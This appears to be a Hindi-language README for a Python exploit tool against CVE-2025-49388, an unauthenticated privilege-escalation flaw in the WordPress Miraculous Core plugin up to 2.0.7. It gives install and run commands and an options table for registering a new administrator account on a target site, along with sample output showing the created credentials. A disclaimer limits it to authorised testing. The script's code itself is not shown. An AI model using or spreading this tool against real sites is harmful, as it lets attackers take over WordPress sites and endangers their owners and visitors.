
Miraculous Core (kamleshyadav) ≤ 2.0.7 — बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
WordPress Miraculous Core Plugin Plugin <= 2.0.7 विशेषाधिकार वृद्धि (Privilege Escalation) के लिए संवेदनशील है।
गलत विशेषाधिकार असाइनमेंट (Incorrect Privilege Assignment) कमजोरी kamleshyadav के Miraculous Core Plugin में अनधिकृत हमलावरों को विशेषाधिकार बढ़ाने और व्यवस्थापक खाते पंजीकृत करने की अनुमति देती है।
प्रभावित संस्करण: n/a से 2.0.7 तक
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (मूल्यांकन अभी उपलब्ध नहीं है)
यह Python स्क्रिप्ट Miraculous Core प्लगइन स्थापित संवेदनशील WordPress इंस्टेंस पर एक नया व्यवस्थापक खाता पंजीकृत करके CVE-2025-49388 का स्वचालित शोषण करती है।
यह उच्च विश्वसनीयता प्रदान करती है, बार-बार विश्वसनीय शोषण के लिए डेटा को यादृच्छिक बनाती है, और स्वचालित रूप से हेडर, कुकीज़ और बायपास प्रयासों को संभालती है।
निर्भरताएँ स्थापित करें:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [OPTIONS]
उदाहरण:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
नोट:
यदि आप उपयोगकर्ता नाम या ईमेल छोड़ते हैं, तो डुप्लिकेट त्रुटियों से बचने के लिए प्रत्येक रन के लिए यादृच्छिक मान उत्पन्न होंगे।
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
स्पष्ट अनुमति के बिना सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।
लेखक दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है। जिम्मेदारी से उपयोग करें।
| विकल्प | विवरण | उदाहरण |
|---|
-u, --url | लक्षित WordPress URL (आवश्यक) | -u http://target.com/wordpress |
-un, --username | इच्छित उपयोगकर्ता नाम (डिफ़ॉल्ट: यादृच्छिक) | -un admin1337 |
-fn, --full_name | पूरा नाम (डिफ़ॉल्ट: Nxploited) | -fn "John Doe" |
-em, --useremail | ईमेल (डिफ़ॉल्ट: यादृच्छिक) | -em [email protected] |
-pw, --password | पासवर्ड (डिफ़ॉल्ट: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | परिणामों को फ़ाइल में लॉग करें | -o result.txt |